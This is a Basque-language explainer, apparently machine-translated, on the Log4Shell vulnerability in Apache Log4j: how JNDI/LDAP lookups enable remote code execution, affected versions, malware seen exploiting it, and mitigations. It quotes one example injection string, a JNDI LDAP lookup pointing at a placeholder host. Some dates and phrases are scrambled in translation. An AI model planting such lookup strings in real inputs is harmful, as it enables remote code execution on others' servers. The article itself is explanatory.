Edukien aurkibidea[Ezkutatu][Erakutsi]
2021eko azaroaren amaieran, zibersegurtasunerako mehatxu handi bat aurkitu genuen. Ustiapen honek mundu osoko milioika sistema informatikori eragingo lieke.
Hau Log4j ahultasunari buruzko gida bat da eta nola ahaztutako diseinu akats batek munduko zerbitzu informatikoen % 90 baino gehiago erasotzeko irekita utzi zuen.
Apache Log4j Apache Software Foundation-ek garatutako Javan oinarritutako kode irekiko erregistro-erabilgarritasuna da. Jatorriz Ceki Gülcük 2001ean idatzi zuen, gaur egun Apache Logging Services-en parte da, Apache Software Foundation-en proiektu bat.
Mundu osoko enpresek Log4j liburutegia erabiltzen dute beren aplikazioetan saioa hasteko. Izan ere, Java liburutegia hain da nonahikoa, Amazon, Microsoft, Google eta abarretako aplikazioetan aurki dezakezu.
Liburutegiaren protagonismoak esan nahi du kodearen akats potentzialak milioika ordenagailu pirateatzeko irekita utzi ditzakeela. 24eko azaroaren 2021an, a cloud segurtasuna Alibaban lan egiten zuen ikertzaileak akats izugarri bat aurkitu zuen.
Log4j ahultasuna, Log4Shell izenez ere ezaguna, oharkabean zegoen 2013az geroztik. Ahuleziari esker, eragile gaiztoek kodea exekutatu ahal izan zuten kaltetutako sistemetan Log4j exekutatzen zuten. 9eko abenduaren 2021an ezagutarazi zen jendaurrean
Industria adituek Log4Shell akatsari deitzen diote azken memoriako ahultasun handiena.
Ahultasuna argitaratu ondorengo astean, zibersegurtasun taldeek milioika eraso detektatu zituzten. Ikertzaile batzuek minutuko ehun eraso baino gehiagoko tasa ere ikusi zuten.
Nola funtzionatzen du?
Log4Shell zergatik den hain arriskutsua ulertzeko, zertarako gai den ulertu behar dugu.
Log4Shell ahultasunak kode arbitrarioa exekutatzeko aukera ematen du, eta horrek, funtsean, esan nahi du erasotzaileak edozein komando edo kode exekutatu dezakeela xede makina batean.
Nola lortzen du hori?
Lehenik eta behin, JNDI zer den ulertu behar dugu.
Java Naming and Directory Interface (JNDI) Java zerbitzu bat da, eta Java programei datuak eta baliabideak aurkitu eta bilatzeko aukera ematen die izen baten bidez. Direktorio-zerbitzu hauek garrantzitsuak dira erregistro-multzo antolatu bat eskaintzen baitute garatzaileek aplikazioak sortzerakoan erraz erreferentzia izan dezaten.
JNDI-k hainbat protokolo erabil ditzake direktorio jakin batera sartzeko. Protokolo horietako bat Lightweight Directory Access Protocol edo LDAP da.
Kate bat erregistratzean, log4j kateen ordezkapenak egiten ditu formako adierazpenak aurkitzen dituenean ${prefix:name}
.
Esate baterako, Text: ${java:version}
baliteke Testu gisa erregistratuta: Java 1.8.0_65 bertsioa. Ordezkapen mota hauek ohikoak dira.
Esamoldeak ere izan ditzakegu Text: ${jndi:ldap://example.com/file}
JNDI sistema erabiltzen duena LDAP protokoloaren bidez URL batetik Java objektu bat kargatzeko.
Honek URL horretatik datozen datuak eraginkortasunez kargatzen ditu makinan. Edozein hacker potentzial kode gaiztoak osta ditzake URL publiko batean eta Log4j erabiltzen duten makinek erregistratu arte itxaron dezakete.
Erregistro-mezuen edukiak erabiltzaileak kontrolatutako datuak dituenez, hacker-ek beren JNDI erreferentziak txerta ditzakete, haiek kontrolatzen dituzten LDAP zerbitzarietara bideratzen dutenak. LDAP zerbitzari hauek Java objektu gaiztoz beteta egon daitezke, JNDIk ahultasunaren bidez exekuta ditzakeen.
Hau okerragoa dena da ez duela axola aplikazioa zerbitzariaren edo bezeroaren aldeko aplikazioa den.
Erregistratzaileak erasotzailearen kode gaiztoa irakurtzeko modurik dagoen bitartean, aplikazioa ustiapenetarako irekita dago oraindik.
Nork eragiten du?
Ahultasunak APache Log4j erabiltzen duten sistema eta zerbitzu guztiei eragiten die, 2.0 bertsioak eta 2.14.1 barne.
Segurtasuneko hainbat adituk aholkatzen dute ahultasunak Java erabiltzen duten aplikazio batzuetan eragina izan dezakeela.
Akatsa Microsoften jabetzako Minecraft bideo-jokoan aurkitu zen lehen aldiz. Microsoft-ek erabiltzaileei eskatu die Java edizioko Minecraft softwarea berritzeko, edozein arrisku saihesteko.
Jen Easterly, Zibersegurtasun eta Azpiegituren Segurtasun Agentziaren (CISA) zuzendariak dio saltzaileek badutela ardura handia azken erabiltzaileek ahultasun hori ustiatzen duten aktore gaiztoak saihesteko.
"Saltzaileek ere bezeroekin komunikatu beharko lukete azken erabiltzaileek jakin dezaten beren produktuak ahultasun hori duela eta software eguneraketak lehenetsi behar dituztela".
Erasoak dagoeneko hasi omen dira. Symantec-ek, zibersegurtasun softwarea eskaintzen duen konpainiak, askotariko eraso-eskaerak ikusi ditu.
Hona hemen ikertzaileek detektatu dituzten eraso motaren adibide batzuk:
- botnets
Botnetak erasotzaile bakar baten kontrolpean dauden ordenagailuen sare bat dira. DDoS erasoak, datuak lapurtzen eta beste iruzurrak egiten laguntzen dute. Ikertzaileek Muhstik botnet-a ikusi zuten Log4j ustiapenetik deskargatutako shell scriptetan.
- XMRig Miner Troiako
XMRig kode irekiko kriptografia-moneta meatzaria da, CPUak erabiltzen dituena Monero tokena minatzeko. Ziberkriminalek XMRig instalatu dezakete jendearen gailuetan, haien prozesatzeko ahalmena haiek jakin gabe erabil dezaten.
- Khonsari ransomwarea
Ransomware-ek diseinatutako malware mota bati egiten dio erreferentzia fitxategiak enkriptatu ordenagailu batean. Erasotzaileek ordainketa eska dezakete enkriptatutako fitxategiei sarbidea ematearen truke. Ikertzaileek Khonsari ransomwarea aurkitu zuten Log4Shell erasoetan. Windows zerbitzariak bideratzen dituzte eta .NET frameworka erabiltzen dute.
Zer gertatzen da hurrengoa?
Adituek aurreikusten dute hilabeteak edo agian urteak beharko dituztela Log4J ahultasunak eragindako kaosa guztiz konpontzeko.
Prozesu honek kaltetutako sistema guztiak adabakitutako bertsio batekin eguneratzea dakar. Nahiz eta sistema horiek guztiak adabakituta egon, oraindik hackerrek zerbitzariak erasorako irekita zeuden leihoan gehitutako atzeko ate posibleen mehatxua dago.
Asko irtenbideak eta aringarriak existitzen dira akats honen bidez aplikazioak ustiatu ez daitezen. Log4j 2.15.0-rc1 bertsio berriak hainbat ezarpen aldatu ditu ahultasun hori arintzeko.
JNDI erabiltzen duten eginbide guztiak lehenespenez desgaitu egingo dira eta urruneko bilaketak ere mugatu dira. Log4j-en konfigurazioan bilaketa eginbidea desgaitzeak balizko ustiapenen arriskua murrizten lagunduko du.
Log4j-tik kanpo, oraindik ere plan zabalago baten beharra dago kode irekiko ustiaketa saihesteko.
Maiatzaren hasieran, Etxe Zuriak bat kaleratu zuen eskaera exekutiboa zibersegurtasun nazionala hobetzea helburu zuena. Softwarearen material-fakturarako (SBOM) xedapen bat barne hartzen zuen, funtsean, aplikazioa eraikitzeko beharrezkoak diren elementu guztien zerrenda biltzen zuen dokumentu formal bat zen.
Honek, esaterako, zatiak barne hartzen ditu kode irekiko garapenerako erabiltzen diren paketeak, mendekotasunak eta APIak. SBOMen ideia gardentasunerako lagungarria den arren, benetan lagunduko al dio kontsumitzaileari?
Mendekotasunak berritzea arazo handiegia izan daiteke. Enpresek isunak ordaintzea aukera dezakete, pakete alternatiboak aurkitzeko denbora gehiago galtzeko arriskua baino. Beharbada SBOM hauek baliagarriak badira bakarrik izango dira esparrua gehiago mugatuta dago.
Ondorioa
Log4j arazoa erakundeentzako arazo tekniko bat baino gehiago da.
Enpresa-buruek beren zerbitzariak, produktuak edo zerbitzuak beraiek mantentzen ez duten kodean oinarritzen direnean gerta litezkeen arriskuen berri izan behar dute.
Kode irekiko eta hirugarrenen aplikazioetan fidatzea beti dakar nolabaiteko arriskua. Enpresek arriskuak murrizteko estrategiak lantzea kontuan hartu beharko lukete mehatxu berriak agertu aurretik.
Webaren zati handi bat mundu osoko milaka boluntariok mantentzen duten kode irekiko softwarean oinarritzen da.
Sarea leku seguru bat mantendu nahi badugu, gobernuek eta korporazioek kode irekiko ahaleginak eta zibersegurtasun agentziak finantzatzen inbertitu beharko lukete, esaterako. CISA.
Utzi erantzun bat